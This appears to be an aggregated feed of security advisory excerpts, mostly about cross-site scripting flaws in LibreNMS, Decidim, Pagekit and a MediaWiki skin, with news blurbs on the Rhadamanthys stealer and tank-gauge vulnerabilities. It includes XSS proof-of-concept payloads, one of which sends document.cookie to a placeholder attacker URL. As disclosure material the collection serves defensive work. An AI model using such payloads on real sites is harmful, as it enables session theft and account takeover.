#xss

### Summary A Self Cross-Site Scripting (Self-XSS) vulnerability in the "Alert Templates" feature allows users to inject arbitrary JavaScript into the alert template's name. This script executes immediately upon submission but does not persist after a page refresh. ### Details The vulnerability occurs when creating an alert template in the LibreNMS interface. Although the application sanitizes the "name" field when storing it in the database, this newly created template is immediately added to the table without any sanitization being applied to the name, allowing users to inject arbitrary JavaScript. This script executes when the template is created but does not persist in the database, thus preventing stored XSS. For instance, the following payload can be used to exploit the vulnerability: ```test1<script>{onerror=alert}throw 1337</script>``` The root cause of this vulnerability lies in the lack of sanitization of the "name" variable before it is rendered in the table. The vulnerab...

### Summary A Stored Cross-Site Scripting (XSS) vulnerability in the "Device Dependencies" feature allows authenticated users to inject arbitrary JavaScript through the device name ("hostname" parameter). This vulnerability can lead to the execution of malicious code in the context of other users' sessions, potentially compromising their accounts and allowing unauthorized actions. ### Details The vulnerability occurs when creating a device within LibreNMS. An attacker can inject arbitrary JavaScript into the hostname parameter. This malicious script is then executed when another user visits the device dependencies page, resulting in an automatic redirect to a website controlled by the attacker. This redirect can be used to steal session cookies or perform other malicious actions. For example, the following payload can be used to exploit the vulnerability: ```t'' autofocus onfocus="document.location='https://<attacker_url>/?c='+document.cookie"``` When the device dependencies page is...

### Impact The version control feature used in resources is subject to potential cross-site scripting (XSS) attack through a malformed URL. ### Workarounds Not available ### References OWASP ASVS v4.0.3-5.1.3 ### Credits This issue was discovered in a security audit organized by [Open Source Politics](https://opensourcepolitics.eu/) against Decidim done during July 2025.

Did you know that over 80% of web applications fail due to poor planning and execution? Now imagine…

The threat actors behind the Rhadamanthys information stealer have added new advanced features to the malware, including using artificial intelligence (AI) for optical character recognition (OCR) as part of what's called "Seed Phrase Image Recognition." "This allows Rhadamanthys to extract cryptocurrency wallet seed phrases from images, making it a highly potent threat for anyone dealing in

Pagekit 1.0.18 is vulnerable to Cross Site Scripting (XSS) in index.php/admin/site/widget.

### Summary A user with the `editmyprivateinfo` right or who can otherwise change their name can XSS themselves by setting their "real name" to an XSS payload. ### Details Here's the offending line: https://github.com/StarCitizenTools/mediawiki-skins-Citizen/blob/d45c3d69f30863f622f16eb40dd41d3ca943454a/includes/Components/CitizenComponentUserInfo.php#L137 This was introduced in 717d16af35b10dab04d434aefddbf991fc8c168c ### PoC 1. Login 2. Go to Special:Preferences 3. Set the real name field to a string like `<script>alert("Admin with a propensity for self-XSSes")</script>` 4. Save your settings and use Citizen if it's not being used already  ### Impact Any user who can change their name (whether it's through the editmyprivateinfo right or through other means) can add XSS payloads that trigger for themselves only.

Student Management System version 1.0 suffers from an insecure cookie handling vulnerability.

Sample Blog Site version 1.0 suffers from cross site scripting and remote file inclusion vulnerabilities.

Critical security vulnerabilities have been disclosed in six different Automatic Tank Gauge (ATG) systems from five manufacturers that could expose them to remote attacks. "These vulnerabilities pose significant real-world risks, as they could be exploited by malicious actors to cause widespread damage, including physical damage, environmental hazards, and economic losses," Bitsight researcher